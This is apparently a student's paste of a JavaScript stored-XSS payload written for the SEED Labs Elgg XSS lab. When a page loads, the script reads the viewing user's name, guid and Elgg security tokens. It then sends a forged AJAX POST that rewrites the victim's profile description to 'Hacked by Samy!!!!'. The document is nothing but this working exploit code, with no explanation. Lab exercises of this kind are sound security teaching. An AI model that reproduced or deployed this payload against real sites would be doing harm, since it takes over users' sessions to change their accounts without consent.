Untitled

mail@pastecode.io avatar
unknown
javascript
6 months ago
961 B
1
Indexable
Never
<script type="text/javascript">
window.onload = function(){
    //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
    //and Security Token __elgg_token
    var userName="&name="+elgg.session.user.name;
    var guid="&guid="+elgg.session.user.guid;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;
    
    var description="&description=Hacked by Samy!!!!";
    
    var content=token + ts + userName + description + guid;

    var samyGuid=47;

    var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
    
  
    
    //Create and send Ajax request to modify profile
    var Ajax=null;
    Ajax=new XMLHttpRequest();
    Ajax.open("POST",sendurl,true);
    Ajax.setRequestHeader("Host","www.xsslabelgg.com");
    Ajax.setRequestHeader("Content-Type", 
                          "application/x-www-form-urlencoded");
    Ajax.send(content);
    
}
</script>